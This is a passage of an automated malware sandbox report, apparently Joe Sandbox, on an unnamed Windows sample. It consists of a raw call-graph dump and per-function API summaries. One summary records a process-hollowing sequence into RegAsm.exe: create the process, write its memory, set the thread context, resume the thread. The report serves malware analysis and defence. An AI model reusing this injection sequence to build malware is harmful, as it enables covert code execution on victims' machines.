20151->19530 20152 f94edd 20152->20147 20152->20149 20156 f9afd6 codecvt 3 API calls 20153->20156 20155 f978bd std::_Lockit::~_Lockit 2 API calls 20154->20155 20157 f94f3e 20155->20157 20158 f94f4f 20156->20158 20157->19530 20159 f97865 std::_Lockit::_Lockit 7 API calls 20158->20159 20160 f94f7b 20159->20160 20161 f9501f 20160->20161 20162 f94fc1 20160->20162 20372 f97b82 20161->20372 20336 f99095 20162->20336 20182 f93230 49 API calls 20181->20182 20183 f96ece 20182->20183 20184 f92230 std::ios_base::_Init 49 API calls 20183->20184 20185 f96f53 20184->20185 20186 f96f66 20185->20186 20187 f94b80 49 API calls 20185->20187 20186->19530 20187->20186 20189 f94ac1 20188->20189 20191 f94b4e 20188->20191 20190 f93230 49 API calls 20189->20190 20193 f94aca 20190->20193 20191->19530 20192 f94b3d 20192->20191 20194 f94b80 49 API calls 20192->20194 20193->20192 20195 f92230 std::ios_base::_Init 49 API calls 20193->20195 20194->20191 20195->20192 20197 f97865 std::_Lockit::_Lockit 7 API calls 20196->20197 20198 f964a5 20197->20198 20199 f97865 std::_Lockit::_Lockit 7 API calls 20198->20199 20204 f964e0 20198->20204 20200 f964bf 20199->20200 20202 f978bd std::_Lockit::~_Lockit 2 API calls 20200->20202 20201 f978bd std::_Lockit::~_Lockit 2 API calls 20203 f9650f 20201->20203 20202->20204 20203->19541 20205 f96506 20204->20205 20206 f9afd6 codecvt 3 API calls 20204->20206 20205->20201 20207 f96547 20206->20207 20208 f97865 std::_Lockit::_Lockit 7 API calls 20207->20208 20209 f96576 20208->20209 20210 f965c8 20209->20210 20211 f96644 20209->20211 20213 f99095 std::_Locinfo::_Locinfo_ctor 70 API calls 20210->20213 20212 f97b82 codecvt 44 API calls 20211->20212 20214 f9664e 20212->20214 20215 f965d3 20213->20215 20216 f9a413 __Getctype 43 API calls 20215->20216 20217 f965ea 20216->20217 20643 f9a58a 20217->20643 20220 f91a20 codecvt 70 API calls 20221 f96629 20220->20221 20653 f98f65 20221->20653 20224 f93230 49 API calls 20223->20224 20226 f96d5e 20224->20226 20225 f92230 std::ios_base::_Init 49 API calls 20228 f96deb 20225->20228 20226->20225 20227 f96dfe 20227->19541 20228->20227 20229 f94b80 49 API calls 20228->20229 20229->20227 20232 f9324c 20230->20232 20231 f93260 20231->20138 20232->20231 20233 f94a80 49 API calls 20232->20233 20234 f9327f 20233->20234 20234->20138 20236 f9224a 20235->20236 20236->20139 20237 f9bc00 Concurrency::cancel_current_task RaiseException 20236->20237 20238 f92262 std::ios_base::_Init 20236->20238 20237->20238 20249 f92160 20238->20249 20240 f92298 20241 f9bc00 Concurrency::cancel_current_task RaiseException 20240->20241 20242 f922a7 20241->20242 20243 f9bb5b ___std_exception_copy 43 API calls 20242->20243 20244 f922d2 20243->20244 20244->20139 20246 f94be3 20245->20246 20247 f94bbe 20245->20247 20246->20140 20247->20246 20320 f93cd0 20247->20320 20250 f921a8 20249->20250 20250->20250 20269 f95560 20250->20269 20252 f921be 20277 f914d0 20252->20277 20254 f921cf 20255 f921f7 messages 20254->20255 20257 f9221c 20254->20257 20256 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20255->20256 20258 f92216 20256->20258 20259 fa2e2f std::_Throw_Cpp_error 43 API calls 20257->20259 20258->20240 20260 f92221 20259->20260 20260->20240 20261 f9bc00 Concurrency::cancel_current_task RaiseException 20260->20261 20262 f92262 std::ios_base::_Init 20260->20262 20261->20262 20263 f92160 std::ios_base::_Init 49 API calls 20262->20263 20264 f92298 20263->20264 20265 f9bc00 Concurrency::cancel_current_task RaiseException 20264->20265 20266 f922a7 20265->20266 20267 f9bb5b ___std_exception_copy 43 API calls 20266->20267 20268 f922d2 20267->20268 20268->20240 20270 f955e9 20269->20270 20274 f95570 20269->20274 20271 f913f0 std::_Throw_Cpp_error 44 API calls 20270->20271 20273 f955ee 20271->20273 20272 f95575 _Yarn 20272->20252 20274->20272 20275 f97630 std::_Throw_Cpp_error 49 API calls 20274->20275 20276 f955c3 _Yarn 20275->20276 20276->20252 20278 f91515 20277->20278 20279 f91757 20278->20279 20282 f9152a 20278->20282 20280 f913f0 std::_Throw_Cpp_error 44 API calls 20279->20280 20281 f9175c 20280->20281 20284 fa2e2f std::_Throw_Cpp_error 43 API calls 20281->20284 20285 f97630 std::_Throw_Cpp_error 49 API calls 20282->20285 20287 f9152f _Yarn 20282->20287 20283 f915bc 20291 f96330 std::_Throw_Cpp_error 44 API calls 20283->20291 20293 f91634 _Yarn 20283->20293 20286 f91761 20284->20286 20285->20287 20289 fa2e2f std::_Throw_Cpp_error 43 API calls 20286->20289 20287->20283 20301 f96330 20287->20301 20290 f91766 20289->20290 20316 f9bbbe 20290->20316 20291->20293 20293->20281 20295 f9169d messages 20293->20295 20294 f91782 messages 20294->20254 20296 f9bb5b ___std_exception_copy 43 API calls 20295->20296 20297 f916f2 20296->20297 20297->20286 20298 f91723 messages 20297->20298 20299 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20298->20299 20300 f91751 20299->20300 20300->20254 20302 f96472 20301->20302 20304 f9634d 20301->20304 20303 f913f0 std::_Throw_Cpp_error 44 API calls 20302->20303 20305 f96477 20303->20305 20306 f963bc 20304->20306 20307 f963af 20304->20307 20309 f96366 20304->20309 20308 f91370 std::_Throw_Cpp_error 44 API calls 20305->20308 20312 f9afd6 codecvt 3 API calls 20306->20312 20314 f96376 _Yarn 20306->20314 20307->20305 20307->20309 20308->20314 20310 f9afd6 codecvt 3 API calls 20309->20310 20310->20314 20311 fa2e2f std::_Throw_Cpp_error 43 API calls 20313 f96481 20311->20313 20312->20314 20314->20311 20315 f9642f _Yarn messages 20314->20315 20315->20283 20317 f9bbcb 20316->20317 20319 f9bbd2 20316->20319 20318 fa21bf ___vcrt_freefls@4 14 API calls 20317->20318 20318->20319 20319->20294 20321 f92230 std::ios_base::_Init 49 API calls 20320->20321 20322 f93cef 20321->20322 20322->20246 20324 f9787b 20323->20324 20325 f97874 20323->20325 20327 f94ea2 20324->20327 20382 f9a8c8 EnterCriticalSection 20324->20382 20377 fa2fd0 20325->20377 20327->20145 20327->20152 20330 fa2fde 20329->20330 20331 f978c7 20329->20331 20435 fa2fb9 LeaveCriticalSection 20330->20435 20333 f978da 20331->20333 20434 f9a8d6 LeaveCriticalSection 20331->20434 20333->20152 20334 fa2fe5 20334->20152 20436 fa4762 20336->20436 20340 f990b9 20341 f990c9 20340->20341 20342 fa4762 std::_Locinfo::_Locinfo_ctor 70 API calls 20340->20342 20343 f98eef _Yarn 14 API calls 20341->20343 20342->20341 20344 f94fcc 20343->20344 20345 f9a413 20344->20345 20610 fa4fb4 20345->20610 20347 f9a41c __Getctype 20348 f9a454 20347->20348 20349 f9a436 20347->20349 20351 fa4e6d __Getctype 43 API calls 20348->20351 20350 fa4e6d __Getctype 43 API calls 20349->20350 20352 f9a43d 20350->20352 20351->20352 20615 fa4fd9 20352->20615 20355 f94fe3 20357 f91a20 20355->20357 20636 f990e0 20357->20636 20640 f97ad9 20372->20640 20375 f9bc00 Concurrency::cancel_current_task RaiseException 20376 f97ba1 20375->20376 20383 fa918b 20377->20383 20382->20327 20404 fa8a91 20383->20404 20403 fa91bd 20403->20403 20405 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20404->20405 20406 fa8aa7 20405->20406 20407 fa8aab 20406->20407 20408 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20407->20408 20409 fa8ac1 20408->20409 20410 fa8ac5 20409->20410 20411 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20410->20411 20412 fa8adb 20411->20412 20413 fa8adf 20412->20413 20414 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20413->20414 20415 fa8af5 20414->20415 20416 fa8af9 20415->20416 20417 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20416->20417 20418 fa8b0f 20417->20418 20419 fa8b13 20418->20419 20420 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20419->20420 20421 fa8b29 20420->20421 20422 fa8b2d 20421->20422 20423 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20422->20423 20424 fa8b43 20423->20424 20425 fa8b47 20424->20425 20426 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20425->20426 20427 fa8b5d 20426->20427 20428 fa8b7b 20427->20428 20429 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20428->20429 20430 fa8b91 20429->20430 20431 fa8b61 20430->20431 20432 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 20431->20432 20433 fa8b77 20432->20433 20433->20403 20434->20333 20435->20334 20437 fa918b std::_Locinfo::_Locinfo_ctor 5 API calls 20436->20437 20438 fa476f 20437->20438 20445 fa450d 20438->20445 20441 f98eef 20442 f98efd 20441->20442 20444 f98f09 _Yarn 20441->20444 20443 fa21bf ___vcrt_freefls@4 14 API calls 20442->20443 20442->20444 20443->20444 20444->20340 20444->20444 20446 fa4519 ___scrt_is_nonwritable_in_current_image 20445->20446 20453 fa2f71 EnterCriticalSection 20446->20453 20448 fa4527 20454 fa4568 20448->20454 20453->20448 20479 fa46c7 20454->20479 20456 fa4583 20457 fa9827 __Getctype 43 API calls 20456->20457 20473 fa4534 20456->20473 20458 fa4590 20457->20458 20503 fae8c4 20458->20503 20461 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 20464 fa45e1 20461->20464 20462 fa2e4c __Getctype 11 API calls 20463 fa46c6 20462->20463 20465 fae8c4 std::_Locinfo::_Locinfo_ctor 45 API calls 20464->20465 20464->20473 20466 fa45fd 20465->20466 20467 fa461f 20466->20467 20468 fa4604 20466->20468 20472 fa899f ___free_lconv_mon 14 API calls 20467->20472 20474 fa464a 20467->20474 20469 fa45bc 20468->20469 20470 fa4616 20468->20470 20469->20462 20469->20473 20471 fa899f ___free_lconv_mon 14 API calls 20470->20471 20471->20473 20472->20474 20476 fa455c 20473->20476 20474->20473 20475 fa899f ___free_lconv_mon 14 API calls 20474->20475 20475->20473 20609 fa2fb9 LeaveCriticalSection 20476->20609 20478 f990a1 20478->20441 20480 fa46d3 20479->20480 20481 fa46e1 20479->20481 20509 fa7598 20480->20509 20524 fae502 20481->20524 20484 fa46dd 20484->20456 20486 fa4757 20488 fa2e4c __Getctype 11 API calls 20486->20488 20487 fa8942 __Getctype 14 API calls 20489 fa4713 20487->20489 20490 fa4761 20488->20490 20491 fae502 std::_Locinfo::_Locinfo_ctor 45 API calls 20489->20491 20502 fa473b 20489->20502 20495 fa918b std::_Locinfo::_Locinfo_ctor 5 API calls 20490->20495 20493 fa472a 20491->20493 20492 fa899f ___free_lconv_mon 14 API calls 20494 fa4750 20492->20494 20497 fa473d 20493->20497 20499 fa4731 20493->20499 20494->20456 20496 fa476f 20495->20496 20498 fa450d std::_Locinfo::_Locinfo_ctor 70 API calls 20496->20498 20500 fa7598 std::_Locinfo::_Locinfo_ctor 67 API calls 20497->20500 20501 fa4798 20498->20501 20499->20486 20499->20502 20500->20502 20501->20456 20502->20492 20504 fae8d8 _Fputc 20503->20504 20569 fae53f 20504->20569 20507 fa06a0 _Fputc 43 API calls 20508 fa45b5 20507->20508 20508->20461 20508->20469 20510 fa75ae 20509->20510 20511 fa75c2 20509->20511 20512 fa2f1d __strnicoll 14 API calls 20510->20512 20513 fa9827 __Getctype 43 API calls 20511->20513 20514 fa75b3 20512->20514 20515 fa75c7 20513->20515 20516 fa2e1f __strnicoll 43 API calls 20514->20516 20517 fa918b std::_Locinfo::_Locinfo_ctor 5 API calls 20515->20517 20518 fa75be 20516->20518 20519 fa75cf 20517->20519 20518->20484 20520 fb1ab3 __Getctype 43 API calls 20519->20520 20521 fa75d4 20520->20521 20530 fa6ba0 20521->20530 20523 fa7616 20523->20484 20525 fae515 _Fputc 20524->20525 20541 fae257 20525->20541 20528 fa06a0 _Fputc 43 API calls 20529 fa46f8 20528->20529 20529->20486 20529->20487 20531 fa6bac ___scrt_is_nonwritable_in_current_image 20530->20531 20534 fa6ccd 20531->20534 20533 fa6bb8 std::_Locinfo::_Locinfo_ctor 20533->20523 20535 fa8942 __Getctype 14 API calls 20534->20535 20536 fa6ce5 20535->20536 20537 fa899f ___free_lconv_mon 14 API calls 20536->20537 20538 fa6cf2 20537->20538 20539 fa6d33 20538->20539 20540 fa6b53 std::_Locinfo::_Locinfo_ctor 67 API calls 20538->20540 20539->20533 20540->20539 20542 fae26a 20541->20542 20543 fae26e 20542->20543 20545 fae296 20542->20545 20544 fa2da2 _Fputc 43 API calls 20543->20544 20548 fae28c 20544->20548 20549 fae2bb 20545->20549 20550 fae337 20545->20550 20547 fa2da2 _Fputc 43 API calls 20547->20548 20548->20528 20549->20547 20549->20548 20551 fae36d 20550->20551 20552 fae381 20551->20552 20553 fae3a5 20551->20553 20562 fae39a 20551->20562 20554 fa2da2 _Fputc 43 API calls 20552->20554 20555 fa1d80 _Fputc 43 API calls 20553->20555 20558 fae3b5 20553->20558 20554->20562 20555->20558 20556 fae3cf 20559 fb4d0d std::_Locinfo::_Locinfo_ctor 5 API calls 20556->20559 20557 fae3ed 20560 fae3f5 20557->20560 20561 fae4ae 20557->20561 20558->20556 20558->20557 20559->20562 20560->20562 20563 faf022 __fread_nolock MultiByteToWideChar 20560->20563 20561->20562 20564 faf022 __fread_nolock MultiByteToWideChar 20561->20564 20562->20549 20565 fae42c 20563->20565 20564->20562 20565->20562 20566 fae437 GetLastError 20565->20566 20566->20562 20568 fae457 20566->20568 20567 faf022 __fread_nolock MultiByteToWideChar 20567->20562 20568->20562 20568->20567 20570 fae556 20569->20570 20571 fae55a 20570->20571 20572 fae582 20570->20572 20573 fa2da2 _Fputc 43 API calls 20571->20573 20577 fae5a4 20572->20577 20578 fae61d 20572->20578 20576 fae578 20573->20576 20575 fa2da2 _Fputc 43 API calls 20575->20576 20576->20507 20577->20575 20577->20576 20579 fae64d 20578->20579 20580 fae67a 20579->20580 20581 fae65c 20579->20581 20592 fae651 20579->20592 20583 fae687 20580->20583 20587 fa1d80 _Fputc 43 API calls 20580->20587 20582 fa2da2 _Fputc 43 API calls 20581->20582 20582->20592 20584 fae6bf 20583->20584 20585 fae6a1 20583->20585 20589 fae84f 20584->20589 20590 fae6d3 20584->20590 20602 fb4eb6 20585->20602 20586 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20591 fae8c2 20586->20591 20587->20583 20589->20592 20593 faf09e _Fputc WideCharToMultiByte 20589->20593 20590->20592 20594 fae76d 20590->20594 20598 fae717 20590->20598 20591->20577 20592->20586 20593->20592 20595 faf09e _Fputc WideCharToMultiByte 20594->20595 20597 fae780 20595->20597 20597->20592 20599 fae799 GetLastError 20597->20599 20606 faf09e 20598->20606 20599->20592 20600 fae7a8 20599->20600 20600->20592 20601 faf09e _Fputc WideCharToMultiByte 20600->20601 20601->20600 20603 fb4eed _Yarn std::_Locinfo::_Locinfo_ctor 20602->20603 20604 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20603->20604 20605 fb4fc0 20604->20605 20605->20592 20608 faf0b5 WideCharToMultiByte 20606->20608 20608->20592 20609->20478 20611 fa9827 __Getctype 43 API calls 20610->20611 20612 fa4fbf 20611->20612 20613 fa9bd5 __Getctype 43 API calls 20612->20613 20614 fa4fcf 20613->20614 20614->20347 20616 fa9827 __Getctype 43 API calls 20615->20616 20617 fa4fe4 20616->20617 20618 fa9bd5 __Getctype 43 API calls 20617->20618 20619 f9a465 20618->20619 20619->20355 20620 fa5482 20619->20620 20621 fa54ca 20620->20621 20622 fa548f _Yarn 20620->20622 20621->20355 20622->20621 20641 f91280 std::invalid_argument::invalid_argument 43 API calls 20640->20641 20642 f97aeb 20641->20642 20642->20375 20644 f9a59d codecvt 20643->20644 20645 fa4fb4 __Getctype 43 API calls 20644->20645 20646 f9a5a5 20645->20646 20656 fa5000 20646->20656 20649 fa4fd9 __Getctype 43 API calls 20650 f9a5b4 20649->20650 20651 fa4e6d __Getctype 43 API calls 20650->20651 20652 f965fe 20650->20652 20651->20652 20652->20220 20654 f9afd6 codecvt 3 API calls 20653->20654 20655 f98f70 20654->20655 20655->20205 20657 fa9827 __Getctype 43 API calls 20656->20657 20658 fa500b 20657->20658 20659 fa9bd5 __Getctype 43 API calls 20658->20659 20660 f9a5ac 20659->20660 20660->20649 20661->19554 25758 fa6f19 25761 fa6be5 25758->25761 25762 fa6bf1 ___scrt_is_nonwritable_in_current_image 25761->25762 25769 fa2f71 EnterCriticalSection 25762->25769 25764 fa6c29 25770 fa6c47 25764->25770 25765 fa6bfb 25765->25764 25767 fb1b34 __Getctype 14 API calls 25765->25767 25767->25765 25769->25765 25773 fa2fb9 LeaveCriticalSection 25770->25773 25772 fa6c35 25773->25772

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,028700FF,028700EF), ref: 028702FC
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0287030F
            • Wow64GetThreadContext.KERNEL32(00000120,00000000), ref: 0287032D
            • ReadProcessMemory.KERNELBASE(0000011C,?,02870143,00000004,00000000), ref: 02870351
            • VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 0287037C
            • TerminateProcess.KERNELBASE(0000011C,00000000), ref: 0287039B
            • WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 028703D4
            • WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 0287041F
            • WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 0287045D
            • Wow64SetThreadContext.KERNEL32(00000120,02890000), ref: 02870499
            • ResumeThread.KERNELBASE(00000120), ref: 028704A8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762149896.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2870000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
            • API String ID: 2440066154-1257834847
            • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction ID: f99ea36e751f535e66b4d737c7f42b8c3810d7eddf6ce0209efc2b4da964a366
            • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction Fuzzy Hash: C4B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA1CEB341D774FA418B94
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 415d6ecb70230e58ddfd6e010e67a58bcf489b47cd535b11abd549c0c3dd0fb1
            • Instruction ID: 22c1cb1d97263393b6275858bd6d0e1f14bee9323734d404d3d32ab0aa8d797e
            • Opcode Fuzzy Hash: 415d6ecb70230e58ddfd6e010e67a58bcf489b47cd535b11abd549c0c3dd0fb1
            • Instruction Fuzzy Hash: 93F06571A15224DBCB26D74CD805A99B3ECEB86BA1F1100A6F551DB151C7F4DE00EBD0

            Control-flow Graph

            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F9524D
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F95267
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95288
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F952B4
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F952E9
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F95326
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F95377
            • std::_Facet_Register.LIBCPMT ref: 00F95396
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F953AF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
            • String ID: bad locale name
            • API String ID: 3434717313-1405518554
            • Opcode ID: aa74d0ee7dcaa3fb6a480b6548a565c7cd742176cda5367151793a1079b6ee7d
            • Instruction ID: 8cc16c0245d3301a6ec6db4b600ffb0d5087de4f721b0cdae802dc2fff7a0058
            • Opcode Fuzzy Hash: aa74d0ee7dcaa3fb6a480b6548a565c7cd742176cda5367151793a1079b6ee7d
            • Instruction Fuzzy Hash: 3441E331A043409FEB15DF68D844B9AB7E0FF90B60F14045DF98897341D779E909EBA2

            Control-flow Graph

            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00FB9CCD
              • Part of subcall function 00F9A7F2: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 00F9A7FE
              • Part of subcall function 00F9A7F2: GetExitCodeThread.KERNEL32(?,?), ref: 00F9A817
              • Part of subcall function 00F9A7F2: CloseHandle.KERNEL32(?), ref: 00F9A829
            • std::_Throw_Cpp_error.LIBCPMT ref: 00FB9D0B
            • std::_Throw_Cpp_error.LIBCPMT ref: 00FB9D12
            • std::_Throw_Cpp_error.LIBCPMT ref: 00FB9D19
            • std::_Throw_Cpp_error.LIBCPMT ref: 00FB9D20
            • GetThreadId.KERNEL32(00000000,C488A511), ref: 00FB9D5D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Cpp_errorThrow_std::_$Thread$CloseCodeCurrentExitHandleObjectSingleWait
            • String ID: Success created.$Success destroyed.
            • API String ID: 2210105531-4203135720
            • Opcode ID: bd5d1d336db9476cda21a46c9fc3f796153d960b0ddd62954b1738286aa63062
            • Instruction ID: 6f49cb0195e1b6b26da4dd666ddaa30ceb52f0c9ff039f0c6927ea37e3535cb8
            • Opcode Fuzzy Hash: bd5d1d336db9476cda21a46c9fc3f796153d960b0ddd62954b1738286aa63062
            • Instruction Fuzzy Hash: 9231EAB1A487026BFB207B658C03F9A77A4EB05B51F100529FA54E61C2E7B99414EBD2

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 110 fa8baf-fa8bbb 111 fa8c4d-fa8c50 110->111 112 fa8bc0-fa8bd1 111->112 113 fa8c56 111->113 115 fa8bde-fa8bf7 LoadLibraryExW 112->115 116 fa8bd3-fa8bd6 112->116 114 fa8c58-fa8c5c 113->114 119 fa8bf9-fa8c02 GetLastError 115->119 120 fa8c5d-fa8c6d 115->120 117 fa8bdc 116->117 118 fa8c76-fa8c78 116->118 122 fa8c4a 117->122 118->114 123 fa8c3b-fa8c48 119->123 124 fa8c04-fa8c16 call fa8908 119->124 120->118 121 fa8c6f-fa8c70 FreeLibrary 120->121 121->118 122->111 123->122 124->123 127 fa8c18-fa8c2a call fa8908 124->127 127->123 130 fa8c2c-fa8c39 LoadLibraryExW 127->130 130->120 130->123
            APIs
            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C488A511,?,00FA8CBC,?,?,?,00000000), ref: 00FA8C70
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID: api-ms-$ext-ms-
            • API String ID: 3664257935-537541572
            • Opcode ID: 60c64cfaebc41966087d026b01109d4fdaaf9370cbd3e8b33922f961ed66fa34
            • Instruction ID: ba43a08fcf585da65e23e5552ced7aaac0c0b0ee8e57b7214f85ba733a1b1239
            • Opcode Fuzzy Hash: 60c64cfaebc41966087d026b01109d4fdaaf9370cbd3e8b33922f961ed66fa34
            • Instruction Fuzzy Hash: 2221D8F2E02214A7CB259B20DC94A5A3768EF537F0F150110E915A7281EFB4ED02EEF1

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?,?,?,?), ref: 00FB9BB8
            • GetUpdateRgn.USER32(00000000,00000000,00000000), ref: 00FB9BC9
            • CreateThread.KERNELBASE(00000000,00000000,00FB9B20,00000000,00000000,00000000), ref: 00FB9C5F
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 00FB9C68
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: AllocCreateObjectSingleThreadUpdateVirtualWait
            • String ID: MZx
            • API String ID: 1268193855-2575928145
            • Opcode ID: 19390cc308b887893dfb4f1445aac32581da66f9edd90f356ad079c6efed2136
            • Instruction ID: 731ada90f16ed52e79339c8c22220ba2829963f309df6c9f6b650680fffff763
            • Opcode Fuzzy Hash: 19390cc308b887893dfb4f1445aac32581da66f9edd90f356ad079c6efed2136
            • Instruction Fuzzy Hash: D231FB71E042086BE704EF69ED86BEDB7B1BF45310F104219FD00AB382EB746A55EB95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 151 f9f7dc-f9f7e7 152 f9f7e9-f9f7fc call fa2f1d call fa2e1f 151->152 153 f9f7fd-f9f810 call f9f78c 151->153 159 f9f83e 153->159 160 f9f812-f9f82f CreateThread 153->160 161 f9f840-f9f84c call f9f6fe 159->161 163 f9f84d-f9f852 160->163 164 f9f831-f9f83d GetLastError call fa2ec3 160->164 166 f9f859-f9f85d 163->166 167 f9f854-f9f857 163->167 164->159 166->161 167->166
            APIs
            • CreateThread.KERNELBASE(?,?,Function_0000F680,00000000,?,?), ref: 00F9F825
            • GetLastError.KERNEL32 ref: 00F9F831
            • __dosmaperr.LIBCMT ref: 00F9F838
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
